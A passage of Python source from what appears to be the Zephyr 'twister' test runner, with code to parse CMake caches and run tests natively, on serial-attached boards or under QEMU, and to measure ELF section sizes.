if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = math.ceil(instance.testsuite.timeout * instance.platform.timeout_multiplier)
self.sourcedir = instance.testsuite.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
If test suite names was found in test's C source code, then verify if
detected suite names from output correspond to expected suite names
(and not in reverse).
"""
expected_suite_names = self.instance.testsuite.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
Change result of performed test if problem with missing or unpropper
suite name was occurred.
"""
self.instance.status = "failed"
self.instance.execution_time = handler_time
for tc in self.instance.testcases:
tc.status = "failed"
self.instance.reason = f"Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.instance.status = "failed"
self.instance.execution_time = handler_time
self.instance.reason = "RunID mismatch"
for tc in self.instance.testcases:
tc.status = "failed"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
self.seed = None
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
# Only valid for native_posix
if self.seed is not None:
command = command + ["--seed="+str(self.seed)]
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.execution_time = handler_time
if not self.terminated and self.returncode != 0:
self.instance.status = "failed"
if run_valgrind and self.returncode == 2:
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.instance.reason = "Failed"
elif harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.status = "failed"
self.instance.reason = "Timeout"
self.instance.add_missing_testscases("blocked", "Timeout")
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.testplan = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
# ignore SerialException which may happen during the serial device
# power off/on process.
except serial.SerialException:
pass
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testsuite.harness_config.get("fixture")
for d in self.testplan.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.testplan.duts:
if serial in [d.serial_pty, d.serial]:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.testplan.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.testplan.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.testplan.west_flash and self.testplan.west_flash != []:
command_extra_args.extend(self.testplan.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
# Receive parameters from an runner_params field
# of the specified hardware map file.
for d in self.testplan.duts:
if (d.platform == self.instance.platform.name) and d.runner_params:
for param in d.runner_params:
command.append(param)
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.instance.status = "failed"
self.instance.reason = "Serial Device Error"
logger.error("Serial device error: %s" % (str(e)))
self.instance.add_missing_testscases("blocked", "Serial Device Error")
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testsuite.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.status = "error"
self.instance.reason = "Device issue (Flash error?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.status = "error"
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if self.instance.status == "error":
self.instance.add_missing_testscases("blocked", self.instance.reason)
if harness.is_pytest:
harness.pytest_run(self.log)
# sometimes a test instance hasn't been executed successfully with no
# status, in order to include it into final report,
# so fill the results as blocked
self.instance.add_missing_testscases("blocked")
if harness.state:
self.instance.status = harness.state
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.instance.execution_time = handler_time
self.instance.status = "error"
self.instance.reason = "No Console Output(Timeout)"
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
if serial_pty:
self.make_device_available(serial_pty)
else:
self.make_device_available(serial_device)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testsuite.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
handler.instance.execution_time = handler_time
if out_state == "timeout":
handler.instance.status = "failed"
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.status = "failed"
handler.instance.reason = "Failed"
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.status = "failed"
handler.instance.reason = out_state
else:
handler.instance.status = out_state
handler.instance.reason = "Unknown"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testsuite.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.instance.status = "failed"
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.instance.add_missing_testscases("blocked")
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
